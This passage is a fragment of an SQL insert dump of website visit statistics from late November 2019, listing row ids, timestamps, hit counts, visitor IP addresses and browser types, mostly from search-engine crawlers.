1,1,0,0,'66.249.64.26','chrome'),(464426,1574835509,1,1,0,0,'213.180.203.37','other'),(464427,1574836233,2,2,0,0,'66.249.64.28','chrome'),(464428,1574836382,2,2,0,0,'207.46.13.16','other'),(464429,1574836759,2,2,0,0,'66.249.64.26','chrome'),(464430,1574836843,2,2,0,0,'207.180.226.173','other'),(464431,1574836938,1,1,0,0,'66.249.70.62','chrome'),(464432,1574837112,1,1,0,0,'66.249.70.33','chrome'),(464433,1574837210,1,1,0,0,'8.29.198.27','other'),(464434,1574837322,1,1,0,0,'46.211.156.176','chrome'),(464435,1574837323,2,2,0,0,'66.249.83.197','chrome'),(464436,1574837886,1,1,0,0,'66.249.64.26','chrome'),(464437,1574838376,1,1,0,0,'66.249.64.27','chrome'),(464438,1574838644,1,1,0,0,'8.29.198.25','other'),(464439,1574838864,1,1,0,0,'207.46.13.16','other'),(464440,1574839147,1,1,0,0,'213.180.203.37','other'),(464441,1574839753,1,1,0,0,'91.196.178.90','chrome'),(464442,1574840118,1,1,0,0,'157.55.39.197','other'),(464443,1574840314,1,1,0,0,'178.154.200.33','other'),(464444,1574840343,1,1,0,0,'213.180.203.44','other'),(464445,1574840504,1,1,0,0,'213.180.203.37','other'),(464446,1574840506,1,1,0,0,'207.46.13.127','other'),(464447,1574840708,1,1,0,0,'207.46.13.16','other'),(464448,1574840791,1,1,0,0,'91.196.178.90','chrome'),(464449,1574840947,2,2,0,0,'66.249.64.27','chrome'),(464450,1574841299,1,1,0,0,'157.55.39.59','other'),(464451,1574842232,1,1,0,0,'66.249.64.28','chrome'),(464452,1574842356,2,2,0,0,'207.46.13.16','other'),(464453,1574843011,1,1,0,0,'66.249.64.26','chrome'),(464454,1574843810,1,1,0,0,'213.180.203.44','other'),(464455,1574844087,1,1,0,0,'69.171.251.27','other'),(464456,1574844088,1,1,0,0,'69.171.251.35','other'),(464459,1574844571,2,2,0,0,'66.249.64.28','chrome'),(464460,1574844937,1,1,0,0,'213.180.203.44','other'),(464461,1574845325,1,1,0,0,'91.196.178.90','chrome'),(464462,1574845347,1,1,0,0,'207.46.13.124','other'),(464463,1574846119,1,1,0,0,'91.196.178.164','chrome'),(464464,1574846139,1,1,0,0,'213.180.203.44','other'),(464465,1574846303,1,1,0,0,'66.249.64.27','chrome'),(464466,1574846651,1,1,0,0,'91.196.178.90','chrome'),(464467,1574846931,1,1,0,0,'207.46.13.56','other'),(464468,1574846935,1,1,0,0,'3.89.79.197','chrome'),(464469,1574847377,1,1,0,0,'66.249.64.27','chrome'),(464470,1574847664,2,2,0,0,'213.180.203.44','other'),(464471,1574848112,1,1,0,0,'8.29.198.25','other'),(464472,1574848288,3,3,0,0,'66.249.64.26','chrome'),(464473,1574848462,1,1,0,0,'80.70.73.250','chrome'),(464474,1574849036,1,1,0,0,'213.180.203.44','other'),(464475,1574849504,1,1,0,0,'8.29.198.26','other'),(464476,1574849696,1,1,0,0,'207.46.13.180','other'),(464477,1574850457,1,1,0,0,'91.196.178.86','firefox'),(464478,1574850648,1,1,0,0,'66.249.64.26','chrome'),(464479,1574850858,1,1,0,0,'91.196.179.33','firefox'),(464480,1574851091,2,2,0,0,'66.249.64.28','chrome'),(464481,1574851375,1,1,0,0,'66.249.64.27','chrome'),(464482,1574851548,1,1,0,0,'213.180.203.44','other'),(464483,1574851664,2,2,0,0,'95.213.141.126','opera'),(464484,1574851673,1,1,0,0,'46.174.71.83','firefox'),(464485,1574852449,1,1,0,0,'66.249.64.27','chrome'),(464486,1574852531,1,1,0,0,'91.196.179.33','firefox'),(464487,1574852634,1,1,0,0,'31.13.115.19','firefox'),(464488,1574852680,1,1,0,0,'212.90.63.186','firefox'),(464489,1574854009,1,1,0,0,'66.249.64.28','chrome'),(464490,1574854134,1,1,0,0,'109.74.154.72','chrome'),(464491,1574854687,1,1,0,0,'91.196.178.77','chrome'),(464492,1574855283,1,1,0,0,'66.249.64.28','chrome'),(464493,1574855649,1,1,0,0,'207.46.13.223','other'),(464494,1574855747,1,1,0,0,'66.249.64.26','chrome'),(464495,1574856861,1,1,0,0,'91.196.178.68','chrome'),(464496,1574856979,1,1,0,0,'213.180.203.44','other'),(464497,1574857317,1,1,0,0,'66.249.64.27','chrome'),(464498,1574857459,1,1,0,0,'66.249.70.36','chrome'),(464499,1574858251,1,1,0,0,'213.180.203.44','other'),(464500,1574858359,1,1,0,0,'66.249.64.27','chrome'),(464501,1574859006,1,1,0,0,'8.29.198.27','other'),(464502,1574859064,1,1,0,0,'207.46.13.180','other'),(464503,1574859071,1,1,0,0,'66.249.64.28','chrome'),(464504,1574859081,1,1,0,0,'66.249.64.26','chrome'),(464505,1574859091,1,1,0,0,'66.249.70.33','chrome'),(464506,1574859297,1,1,0,0,'66.249.70.36','chrome'),(464507,1574859523,1,1,0,0,'66.249.70.62','chrome'),(464508,1574860328,1,1,0,0,'5.196.80.103','firefox'),(464509,1574860386,1,1,0,0,'8.29.198.27','other'),(464510,1574860568,1,1,0,0,'195.114.146.243','chrome'),(464511,1574862244,1,1,0,0,'37.53.231.239','chrome'),(464512,1574863479,3,3,0,0,'66.249.64.28','chrome'),(464513,1574863494,3,3,0,0,'66.249.64.26','chrome'),(464514,1574863568,1,1,0,0,'66.249.64.27','chrome'),(464515,1574863978,1,1,0,0,'157.55.39.114','other'),(464516,1574864153,1,1,0,0,'95.132.14.166','chrome'),(464517,1574864506,1,1,0,0,'66.249.70.33','chrome'),(464518,1574864822,1,1,0,0,'66.249.64.28','chrome'),(464519,1574865423,1,1,0,0,'195.10.210.70','chrome'),(464520,1574865607,1,1,0,0,'66.249.64.26','chrome'),(464521,1574865831,1,1,0,0,'157.55.39.114','other'),(464522,1574866507,1,1,0,0,'66.249.64.27','chrome'),(464523,1574866709,1,1,0,0,'91.196.178.90','chrome'),(464524,1574866870,1,1,0,0,'213.180.203.44','other'),(464525,1574867308,1,1,0,0,'66.249.64.28','chrome'),(464526,1574867313,1,1,0,0,'66.249.64.26','chrome'),(464527,1574867445,1,1,0,0,'66.249.64.27','chrome'),(464528,1574868040,1,1,0,0,'66.249.70.62','chrome'),(464529,1574868356,1,1,0,0,'66.249.70.36','chrome'),(464530,1574868442,9,9,0,0,'31.13.127.24','other'),(464531,1574868443,13,13,0,0,'31.13.127.20','other'),(464532,1574868574,1,1,0,0,'31.13.127.1','other'),(464533,1574868575,10,10,0,0,'31.13.127.8','other'),(464536,1574868576,1,1,0,0,'31.13.127.18','other'),(464541,1574868615,5,5,0,0,'31.13.127.4','other'),(464557,1574868616,2,2,0,0,'31.13.127.9','other'),(464559,1574868617,5,5,0,0,'31.13.127.21','other'),(464572,1574868618,1,1,0,0,'31.13.127.5','other'),(464574,1574868620,1,1,0,0,'31.13.127.11','other'),(464577,1574868772,1,1,0,0,'66.249.64.26','chrome'),(464578,1574869578,1,1,0,0,'213.180.203.44','other'),(464579,1574869756,1,1,0,0,'207.46.13.223','other'),(464580,1574869927,1,1,0,0,'8.29.198.26','other'),(464581,1574870004,2,2,0,0,'66.249.64.27','chrome'),(464582,1574870035,1,1,0,0,'213.180.203.37','other'),(464583,1574870764,1,1,0,0,'66.249.64.28','chrome'),(464584,1574870927,1,1,0,0,'141.8.142.50','other'),(464585,1574871198,1,1,0,0,'157.55.39.114','other'),(464586,1574871204,1,1,0,0,'213.159.213.236','msie'),(464587,1574871519,1,1,0,0,'8.29.198.25','other'),(464588,1574871802,2,2,0,0,'91.196.178.189','chrome'),(464589,1574872366,1,1,0,0,'141.8.142.119','other'),(464590,1574873428,2,2,0,0,'157.55.39.129','other'),(464591,1574873496,3,3,0,0,'213.180.203.44','other'),(464592,1574873564,1,1,0,0,'87.250.224.90','other'),(464593,1574874023,2,2,0,0,'66.249.64.27','chrome'),(464594,1574875019,2,2,0,0,'157.55.39.229','other'),(464595,1574877018,1,1,0,0,'157.55.39.229','other'),(464596,1574877020,1,1,0,0,'5.58.36.150','msie'),(464597,1574877025,1,1,0,0,'66.249.70.36','chrome'),(464598,1574879350,1,1,0,0,'13.66.139.0','other'),(464599,1574880221,1,1,0,0,'213.180.203.44','other'),(464600,1574880314,1,1,0,0,'91.196.178.171','chrome'),(464601,1574880328,1,1,0,0,'66.249.64.27','chrome'),(464602,1574880592,1,1,0,0,'185.230.242.3','other'),(464603,1574880843,1,1,0,0,'8.29.198.25','other'),(464604,1574880933,1,1,0,0,'157.55.39.129','other'),(464605,1574881402,2,2,0,0,'66.249.64.26','chrome'),(464606,1574882433,1,1,0,0,'8.29.198.27','other'),(464607,1574882724,2,1,1,0,'66.249.64.28',''),(464608,1574883167,1,1,0,0,'66.249.64.26','chrome'),(464609,1574883498,1,1,0,0,'107.178.89.232','chrome'),(464610,1574883841,1,0,1,0,'66.249.70.36',''),(464611,1574884379,1,1,0,0,'148.163.72.179','chrome'),(464612,1574884386,1,1,0,0,'148.163.72.134','chrome'),(464613,1574884532,2,2,0,0,'213.180.203.44','other'),(464614,1574884779,2,2,0,0,'66.249.64.26','chrome'),(464615,1574884784,1,1,0,0,'66.249.64.27','chrome'),(464616,1574884785,1,1,0,0,'148.163.70.37','chrome'),(464617,1574884859,1,1,0,0,'107.178.112.168','chrome'),(464618,1574885202,1,1,0,0,'77.111.244.209','chrome'),(464619,1574885855,2,2,0,0,'213.180.203.44','other'),(464620,1574886240,1,1,0,0,'148.163.70.245','chrome'),(464621,1574886341,1,1,0,0,'148.163.123.49','chrome'),(464622,1574886522,1,1,0,0,'148.163.123.23','chrome'),(464623,1574887070,1,1,0,0,'66.249.64.28','chrome'),(464624,1574887082,1,1,0,0,'213.180.203.44','other'),(464625,1574887085,1,1,0,0,'107.178.89.230','chrome'),(464626,1574887168,2,2,0,0,'107.167.92.124','chrome'),(464627,1574887173,1,1,0,0,'213.180.203.37','other'),(464628,1574888170,1,1,0,0,'66.249.64.26','chrome'),(464629,1574888571,1,1,0,0,'66.249.64.28','chrome'),(464630,1574888578,1,1,0,0,'157.55.39.229','other'),(464631,1574889029,1,1,0,0,'148.163.123.49','chrome'),(464632,1574889603,1,1,0,0,'167.114.209.38','other'),(464633,1574889630,1,1,0,0,'167.114.209.38','chrome'),(464634,1574889633,1,1,0,0,'207.46.13.25','other'),(464635,1574889640,1,1,0,0,'66.249.70.62','chrome'),(464636,1574889644,1,1,0,0,'51.77.129.168','other'),(464637,1574889893,2,2,0,0,'66.249.64.26','chrome'),(464638,1574889989,2,2,0,0,'157.55.39.249','other'),(464639,1574889990,1,1,0,0,'107.167.75.164','chrome'),(464640,1574890267,1,1,0,0,'66.249.64.27','chrome'),(464641,1574890388,1,1,0,0,'148.163.70.87','chrome'),(464642,1574890769,1,1,0,0,'148.163.70.71','chrome'),(464643,1574891090,1,1,0,0,'107.178.112.162','chrome'),(464644,1574891417,1,1,0,0,'148.163.123.70','chrome'),(464645,1574891425,1,1,0,0,'213.180.203.44','other'),(464646,1574891452,1,1,0,0,'207.46.13.25','other'),(464647,1574891711,1,1,0,0,'107.167.75.164','chrome'),(464648,1574891742,1,1,0,0,'8.29.198.25','other'),(464649,1574892053,1,1,0,0,'107.167.92.71','chrome'),(464650,1574892089,2,2,0,0,'66.249.64.27','chrome'),(464651,1574892191,1,1,0,0,'107.178.89.213','chrome'),(464652,1574892217,1,1,0,0,'107.178.93.99','chrome'),(464653,1574892689,2,2,0,0,'66.249.70.62','chrome'),(464654,1574892700,2,2,0,0,'66.249.64.26','chrome'),(464655,1574892728,1,1,0,0,'148.163.123.49','chrome'),(464656,1574892916,1,1,0,0,'66.249.64.28','chrome'),(464657,1574893017,1,1,0,0,'148.163.70.23','chrome'),(464658,1574893063,2,2,0,0,'148.163.70.201','chrome'),(464659,1574893074,1,1,0,0,'87.250.224.90','other'),(464660,1574893155,1,1,0,0,'207.46.13.211','other'),(464661,1574893170,1,1,0,0,'148.163.123.125','chrome'),(464662,1574893289,1,1,0,0,'148.163.123.18','chrome'),(464663,1574893319,1,1,0,0,'8.29.198.27','other'),(464664,1574893430,1,1,0,0,'107.178.75.6','chrome'),(464665,1574893740,1,1,0,0,'107.189.160.132','chrome'),(464666,1574894226,1,1,0,0,'107.178.75.11','chrome'),(464667,1574894236,1,1,0,0,'148.163.72.183','chrome'),(464668,1574894257,1,1,0,0,'107.167.75.168','chrome'),(464669,1574894259,2,2,0,0,'213.180.203.44','other'),(464670,1574894538,1,1,0,0,'66.249.64.26','chrome'),(464671,1574894553,1,1,0,0,'141.8.142.2','other'),(464672,1574894762,1,1,0,0,'107.178.75.60','chrome'),(464673,1574894895,1,1,0,0,'107.178.89.148','chrome'),(464674,1574894907,1,1,0,0,'66.249.64.28','chrome'),(464675,1574895024,1,1,0,0,'148.163.70.216','chrome'),(464676,1574895032,1,1,0,0,'148.163.72.187','chrome'),(464677,1574895091,1,1,0,0,'66.249.70.36','chrome'),(464678,1574895540,1,1,0,0,'213.180.203.37','other'),(464679,1574896107,1,1,0,0,'107.178.89.230','chrome'),(464680,1574896155,1,1,0,0,'66.249.64.27','chrome'),(464681,1574896171,3,3,0,0,'66.249.64.26','chrome'),(464682,1574896197,1,1,0,0,'107.167.92.124','chrome'),(464683,1574896212,1,1,0,0,'148.163.70.121','chrome'),(464684,1574896468,1,1,0,0,'148.163.72.16','chrome'),(464685,1574896557,1,1,0,0,'107.178.75.44','chrome'),(464686,1574896661,1,1,0,0,'66.249.70.62','chrome'),(464687,1574897315,1,1,0,0,'107.167.75.166','chrome'),(464688,1574898331,1,1,0,0,'141.8.142.119','other'),(464689,1574898362,1,1,0,0,'37.9.113.10','other'),(464690,1574898382,1,1,0,0,'107.178.112.183','chrome'),(464691,1574898395,1,1,0,0,'95.108.213.55','other'),(464692,1574898446,1,1,0,0,'148.163.72.98','chrome'),(464693,1574898505,1,1,0,0,'148.163.72.134','chrome'),(464694,1574898547,2,2,0,0,'66.249.64.26','chrome'),(464695,1574899026,1,1,0,0,'148.163.70.23','chrome'),(464696,1574899164,1,1,0,0,'107.178.75.60','chrome'),(464697,1574899184,1,1,0,0,'66.249.64.27','chrome'),(464698,1574899365,1,1,0,0,'148.163.123.112','chrome'),(464699,1574899754,1,1,0,0,'107.178.112.168','chrome'),(464700,1574899820,1,1,0,0,'107.167.75.168','chrome'),(464701,1574899906,1,1,0,0,'148.163.72.179','chrome'),(464702,1574900089,1,1,0,0,'148.163.123.70','chrome'),(464703,1574900096,1,1,0,0,'213.180.203.44','other'),(464704,1574900329,1,1,0,0,'207.46.13.211','other'),(464705,1574900418,1,1,0,0,'148.163.123.5','chrome'),(464706,1574900493,1,1,0,0,'157.55.39.229','other'),(464707,1574900587,1,1,0,0,'107.178.112.189','chrome'),(464708,1574900611,2,2,0,0,'148.163.123.49','chrome'),(464709,1574900684,1,1,0,0,'148.163.70.218','chrome'),(464710,1574900717,1,1,0,0,'148.163.70.34','chrome'),(464711,1574901417,1,1,0,0,'66.249.64.28','chrome'),(464712,1574901519,1,1,0,0,'213.180.203.44','other'),(464713,1574901545,1,1,0,0,'148.163.72.98','chrome'),(464714,1574901718,1,1,0,0,'148.163.70.71','chrome'),(464715,1574901857,1,1,0,0,'148.163.70.167','chrome'),(464716,1574902072,1,1,0,0,'148.163.70.13','chrome'),(464717,1574902136,1,1,0,0,'107.178.112.184','chrome'),(464718,1574902610,1,1,0,0,'207.46.13.52','other'),(464719,1574902624,1,1,0,0,'8.29.198.27','other'),(464720,1574902917,1,1,0,0,'148.163.123.67','chrome'),(464721,1574903528,1,1,0,0,'148.163.123.5','chrome'),(464722,1574903903,1,1,0,0,'66.249.64.28','chrome'),(464723,1574903962,1,1,0,0,'148.163.70.144','chrome'),(464724,1574904164,1,1,0,0,'107.178.89.188','chrome'),(464725,1574904166,2,2,0,0,'213.180.203.37','other'),(464726,1574904194,1,1,0,0,'8.29.198.27','other'),(464727,1574904262,2,2,0,0,'213.180.203.44','other'),(464728,1574904310,1,1,0,0,'107.178.93.121','chrome'),(464729,1574904713,1,1,0,0,'148.163.123.18','chrome'),(464730,1574904846,1,1,0,0,'148.163.72.179','chrome'),(464731,1574904930,4,4,0,0,'66.249.64.27','chrome'),(464732,1574904977,1,1,0,0,'66.249.64.28','chrome'),(464733,1574904985,1,1,0,0,'148.163.70.13','chrome'),(464734,1574904998,1,1,0,0,'66.249.70.33','chrome'),(464735,1574905030,1,1,0,0,'148.163.72.187','chrome'),(464736,1574905088,1,1,0,0,'148.163.72.155','chrome'),(464737,1574905294,1,1,0,0,'148.163.70.40','chrome'),(464738,1574905920,1,1,0,0,'66.249.64.28','chrome'),(464739,1574905989,1,1,0,0,'66.249.64.26','chrome'),(464740,1574905994,1,1,0,0,'66.249.64.27','chrome'),(464741,1574906057,1,1,0,0,'107.178.75.6','chrome'),(464742,1574906062,1,1,0,0,'148.163.123.23','chrome'),(464743,1574906235,1,1,0,0,'107.178.89.185','chrome'),(464744,1574906305,1,1,0,0,'148.163.123.125','chrome'),(464745,1574906765,1,1,0,0,'107.178.89.148','chrome'),(464746,1574906883,1,1,0,0,'148.163.70.23','chrome'),(464747,1574907006,1,1,0,0,'148.163.72.236','chrome'),(464748,1574907344,1,1,0,0,'107.167.94.195','chrome'),(464749,1574907396,1,1,0,0,'148.163.72.155','chrome'),(464750,1574907495,1,1,0,0,'66.249.64.28','chrome'),(464751,1574907617,2,2,0,0,'66.249.64.30','chrome'),(464752,1574908299,1,1,0,0,'107.167.75.164','chrome'),(464753,1574908653,1,1,0,0,'107.189.160.132','chrome'),(464754,1574908954,1,1,0,0,'3.122.194.35','other'),(464755,1574908959,2,2,0,0,'66.249.64.28','chrome'),(464756,1574909126,1,1,0,0,'148.163.123.112','chrome'),(464757,1574909128,1,1,0,0,'66.249.70.62','chrome'),(464758,1574909229,1,1,0,0,'157.55.39.229','other'),(464759,1574909586,1,1,0,0,'66.249.64.26','chrome'),(464760,1574909739,1,1,0,0,'148.163.72.232','chrome'),(464761,1574909970,1,1,0,0,'148.163.72.207','chrome'),(464762,1574910003,1,1,0,0,'107.178.93.121','chrome'),(464763,1574910083,1,1,0,0,'107.178.89.254','chrome'),(464764,1574910240,1,1,0,0,'148.163.70.172','chrome'),(464765,1574910494,1,1,0,0,'157.55.39.229','other'),(464766,1574910827,1,1,0,0,'213.180.203.44','other'),(464767,1574911445,1,1,0,0,'66.249.64.26','chrome'),(464768,1574911809,1,1,0,0,'66.249.64.27','chrome'),(464769,1574912371,1,1,0,0,'157.55.39.229','other'),(464770,1574913235,1,1,0,0,'213.180.203.37','other'),(464771,1574913236,2,2,0,0,'66.249.64.28','chrome'),(464772,1574913331,2,2,0,0,'66.249.64.26','chrome'),(464773,1574913339,1,1,0,0,'207.46.13.52','other'),(464774,1574913504,1,1,0,0,'8.29.198.27','other'),(464775,1574914415,4,4,0,0,'213.180.203.44','other'),(464776,1574914669,1,1,0,0,'66.249.64.26','chrome'),(464777,1574914887,2,2,0,0,'157.55.39.70','other'),(464778,1574915086,1,1,0,0,'8.29.198.26','other'),(464779,1574916061,1,1,0,0,'207.46.13.52','other'),(464780,1574916138,3,3,0,0,'66.249.64.27','chrome'),(464781,1574916422,1,1,0,0,'66.249.64.28','chrome'),(464782,1574917344,1,1,0,0,'66.249.70.33','chrome'),(464783,1574917925,2,2,0,0,'213.180.203.44','other'),(464784,1574918798,1,1,0,0,'66.249.64.26','chrome'),(464785,1574919036,1,1,0,0,'66.249.64.28','chrome'),(464786,1574919276,1,1,0,0,'213.180.203.44','other'),(464787,1574920061,2,2,0,0,'157.55.39.70','other'),(464788,1574920387,2,2,0,0,'213.180.203.44','other'),(464789,1574920440,1,1,0,0,'213.180.203.37','other'),(464790,1574921526,1,1,0,0,'66.249.64.27','chrome'),(464791,1574921953,1,1,0,0,'31.13.103.4','other'),(464792,1574921954,1,1,0,0,'31.13.103.1','other'),(464795,1574923149,1,1,0,0,'66.249.64.27','chrome'),(464796,1574924005,1,1,0,0,'91.121.83.160','chrome'),(464797,1574924023,1,1,0,0,'66.249.70.33','chrome'),(464798,1574924069,1,1,0,0,'176.111.33.18','firefox'),(464799,1574924384,2,2,0,0,'66.249.64.26','chrome'),(464800,1574924386,1,1,0,0,'8.29.198.27','other'),(464801,1574925232,1,1,0,0,'213.180.203.44','other'),(464802,1574925476,1,1,0,0,'148.163.70.148','chrome'),(464803,1574926397,1,1,0,0,'213.180.203.44','other'),(464804,1574926537,1,1,0,0,'8.29.198.27','other'),(464805,1574926984,1,1,0,0,'148.163.70.115','chrome'),(464806,1574927412,1,1,0,0,'193.160.224.116','other'),(464807,1574928158,1,1,0,0,'66.249.64.26','chrome'),(464808,1574928226,1,1,0,0,'91.196.178.77','chrome'),(464809,1574928244,1,1,0,0,'193.53.83.44','chrome'),(464810,1574928354,1,1,0,0,'85.115.62.180','chrome'),(464811,1574928463,1,1,0,0,'66.249.64.27','chrome'),(464812,1574929273,1,1,0,0,'212.191.80.145','opera'),(464813,1574929541,1,1,0,0,'213.180.203.37','other'),(464814,1574929822,1,1,0,0,'66.249.64.26','chrome'),(464815,1574930301,1,1,0,0,'66.249.70.62','chrome'),(464816,1574930359,1,1,0,0,'66.249.64.28','chrome'),(464817,1574930586,1,1,0,0,'66.249.64.27','chrome'),(464818,1574930726,1,1,0,0,'91.196.178.173','chrome'),(464819,1574931136,1,1,0,0,'213.180.203.37','other'),(464820,1574931483,1,1,0,0,'91.196.178.189','chrome'),(464821,1574931857,1,1,0,0,'91.196.178.91','chrome'),(464822,1574931884,1,1,0,0,'213.180.203.44','other'),(464823,1574932576,1,1,0,0,'66.249.64.28','chrome'),(464824,1574932624,2,2,0,0,'66.249.64.26','chrome'),(464825,1574933671,1,1,0,0,'3.83.85.91','chrome'),(464826,1574933725,1,1,0,0,'66.249.70.36','chrome'),(464827,1574933830,1,1,0,0,'66.249.64.26','chrome'),(464828,1574933977,2,2,0,0,'157.55.39.70','other'),(464829,1574934041,1,1,0,0,'66.249.64.27','chrome'),(464830,1574934251,1,1,0,0,'46.211.216.242','other'),(464831,1574934278,1,1,0,0,'94.153.111.160','other'),(464832,1574934326,1,1,0,0,'37.52.32.241','chrome'),(464833,1574934965,1,1,0,0,'91.196.178.90','chrome'),(464834,1574935280,1,1,0,0,'8.29.198.27','other'),(464835,1574935740,1,1,0,0,'107.178.112.189','chrome'),(464836,1574935873,1,1,0,0,'66.249.64.26','chrome'),(464837,1574936100,1,1,0,0,'107.178.89.254','chrome'),(464838,1574936615,1,1,0,0,'45.73.171.207','chrome'),(464839,1574936706,1,1,0,0,'66.249.70.33','chrome'),(464840,1574936743,1,1,0,0,'66.249.64.28','chrome'),(464841,1574936748,1,1,0,0,'66.249.64.27','chrome'),(464842,1574937511,1,1,0,0,'8.29.198.27','other'),(464843,1574938170,2,2,0,0,'37.53.235.195','chrome'),(464844,1574938592,1,1,0,0,'109.74.154.72','chrome'),(464845,1574939132,1,1,0,0,'141.8.142.2','other'),(464846,1574939189,1,1,0,0,'107.178.112.162','chrome'),(464847,1574939523,1,1,0,0,'157.55.39.107','other'),(464848,1574939811,1,1,0,0,'148.163.123.142','chrome'),(464849,1574939895,1,1,0,0,'148.163.72.134','chrome'),(464850,1574940133,1,1,0,0,'148.163.72.207','chrome'),(464851,1574940628,1,1,0,0,'107.167.89.198','chrome'),(464852,1574942555,1,1,0,0,'157.55.39.107','other'),(464853,1574942752,1,1,0,0,'66.249.64.27','chrome'),(464854,1574942884,1,1,0,0,'66.249.70.36','chrome'),(464855,1574943349,1,1,0,0,'213.180.203.44','other'),(464856,1574943468,1,1,0,0,'148.163.72.228','chrome'),(464857,1574943779,1,1,0,0,'91.196.177.46','chrome'),(464858,1574943917,1,1,0,0,'95.135.241.207','chrome'),(464859,1574944837,1,1,0,0,'51.158.126.165','chrome'),(464860,1574945140,1,1,0,0,'157.55.39.108','other'),(464861,1574945173,1,1,0,0,'107.167.92.82','chrome'),(464862,1574945377,1,1,0,0,'148.163.70.223','chrome'),(464863,1574946168,1,1,0,0,'8.29.198.25','other'),(464864,1574946248,1,1,0,0,'194.37.248.11','chrome'),(464865,1574946568,1,1,0,0,'157.55.39.107','other'),(464866,1574946696,1,1,0,0,'213.108.75.72','chrome'),(464867,1574947295,1,1,0,0,'194.37.248.11','chrome'),(464868,1574947494,1,1,0,0,'157.55.39.107','other'),(464869,1574948064,1,1,0,0,'157.55.39.108','other'),(464870,1574948434,1,1,0,0,'8.29.198.26','other'),(464871,1574948691,1,1,0,0,'77.222.155.68','chrome'),(464872,1574949984,1,1,0,0,'66.249.70.33','chrome'),(464873,1574950253,1,1,0,0,'107.178.112.184','chrome'),(464874,1574951321,1,1,0,0,'66.249.64.28','chrome'),(464875,1574952531,1,1,0,0,'66.249.70.33','chrome'),(464876,1574952566,1,1,0,0,'91.196.178.84','chrome'),(464877,1574952601,1,1,0,0,'157.55.39.108','other'),(464878,1574952723,1,1,0,0,'66.249.64.28','chrome'),(464879,1574953322,1,1,0,0,'148.163.72.62','chrome'),(464880,1574953323,1,1,0,0,'91.196.178.90','chrome'),(464881,1574953509,1,1,0,0,'46.42.173.246','chrome'),(464882,1574953524,1,1,0,0,'107.178.100.163','chrome'),(464883,1574954025,1,1,0,0,'148.163.72.236','chrome'),(464884,1574954104,8,8,0,0,'31.13.127.5','other'),(464885,1574954105,15,15,0,0,'31.13.127.12','other'),(464897,1574954106,2,2,0,0,'31.13.127.10','other'),(464922,1574954107,2,2,0,0,'31.13.127.3','other'),(464929,1574954108,2,2,0,0,'31.13.127.21','other'),(464935,1574954114,1,1,0,0,'31.13.127.2','other'),(464937,1574954139,5,5,0,0,'31.13.127.23','other'),(464938,1574954140,5,5,0,0,'31.13.127.22','other'),(464944,1574954141,2,2,0,0,'31.13.127.18','other'),(464954,1574954142,2,2,0,0,'31.13.127.14','other'),(464962,1574954143,3,3,0,0,'31.13.127.11','other'),(464963,1574954144,1,1,0,0,'31.13.127.4','other'),(464964,1574954149,1,1,0,0,'31.13.127.13','other'),(464965,1574954467,1,1,0,0,'66.249.64.28','chrome'),(464966,1574954609,1,1,0,0,'66.249.70.62','chrome'),(464967,1574955129,1,1,0,0,'91.196.178.189','chrome'),(464968,1574955433,1,1,0,0,'107.178.93.27','chrome'),(464969,1574955554,1,1,0,0,'157.55.39.108','other'),(464970,1574955591,1,1,0,0,'66.249.64.26','chrome'),(464971,1574955745,1,1,0,0,'85.235.59.53','other'),(464972,1574955784,1,1,0,0,'95.108.213.55','other'),(464973,1574956241,1,1,0,0,'141.8.188.20','other'),(464974,1574956289,1,1,0,0,'157.55.39.107','other'),(464975,1574956360,1,1,0,0,'3.120.251.249','other'),(464976,1574956740,1,1,0,0,'66.249.64.28','chrome'),(464977,1574956761,1,1,0,0,'66.249.64.27','chrome'),(464978,1574957063,1,1,0,0,'8.29.198.27','other'),(464979,1574957588,1,1,0,0,'91.196.178.189','chrome'),(464980,1574957705,1,1,0,0,'178.92.85.161','chrome'),(464981,1574957976,2,2,0,0,'91.196.178.91','chrome'),(464982,1574958767,3,3,0,0,'66.249.64.27','chrome'),(464983,1574958977,1,1,0,0,'213.180.203.37','other'),(464984,1574959104,3,3,0,0,'66.249.64.28','chrome'),(464985,1574959183,1,1,0,0,'66.249.70.62','chrome'),(464986,1574959243,1,1,0,0,'157.55.39.108','other'),(464987,1574959359,1,1,0,0,'8.29.198.25','other'),(464988,1574959425,1,1,0,0,'66.249.64.26','chrome'),(464989,1574960136,1,1,0,0,'159.89.144.143','chrome'),(464990,1574960304,1,1,0,0,'213.180.203.44','other'),(464991,1574960794,1,1,0,0,'66.249.64.28','chrome'),(464992,1574960936,1,1,0,0,'66.249.70.62','chrome'),(464993,1574961234,1,1,0,0,'193.194.127.181','chrome'),(464994,1574961981,1,1,0,0,'66.249.64.27','chrome'),(464995,1574962365,1,1,0,0,'107.167.75.161','chrome'),(464996,1574962731,1,1,0,0,'107.178.112.184','chrome'),(464997,1574962742,1,1,0,0,'66.249.70.36','chrome'),(464998,1574962784,1,1,0,0,'107.189.160.132','chrome'),(464999,1574964010,1,1,0,0,'148.163.72.155','chrome'),(465000,1574964037,1,1,0,0,'66.249.70.33','chrome'),(465001,1574964360,1,1,0,0,'91.196.178.129','other'),(465002,1574965169,2,2,0,0,'66.249.70.33','chrome'),(465003,1574965173,1,1,0,0,'66.249.64.28','chrome'),(465004,1574965569,1,1,0,0,'46.211.244.250','chrome'),(465005,1574965831,1,1,0,0,'178.154.200.71','other'),(465006,1574967166,1,1,0,0,'157.55.39.109','other'),(465007,1574967274,2,2,0,0,'213.180.203.44','other'),(465008,1574967409,1,1,0,0,'94.153.101.117','chrome'),(465009,1574967801,1,1,0,0,'3.120.111.157','other'),(465010,1574967842,1,1,0,0,'157.55.39.108','other'),(465011,1574967932,1,1,0,0,'8.29.198.26','other'),(465012,1574968144,1,1,0,0,'66.249.70.36','chrome'),(465013,1574968970,1,1,0,0,'66.249.64.27','chrome'),(465014,1574969049,1,1,0,0,'66.249.70.62','chrome'),(465015,1574969226,1,1,0,0,'157.55.39.109','other'),(465016,1574969311,1,1,0,0,'107.178.93.59','chrome'),(465017,1574969886,1,1,0,0,'213.180.203.44','other'),(465018,1574970283,1,1,0,0,'8.29.198.26','other'),(465019,1574971522,1,1,0,0,'185.53.79.149','firefox'),(465020,1574972080,1,0,1,0,'66.249.64.26',''),(465021,1574972585,1,1,0,0,'207.46.13.124','other'),(465022,1574972949,1,1,0,0,'209.208.109.226','chrome'),(465023,1574973403,1,1,0,0,'5.58.21.230','chrome'),(465024,1574974780,1,1,0,0,'107.189.160.132','chrome'),(465025,1574975039,1,1,0,0,'157.55.39.108','other'),(465026,1574975446,2,2,0,0,'213.180.203.44','other'),(465027,1574976186,1,1,0,0,'157.55.39.108','other'),(465028,1574977648,1,1,0,0,'31.13.127.11','other'),(465029,1574977649,1,1,0,0,'31.13.127.2','other'),(465032,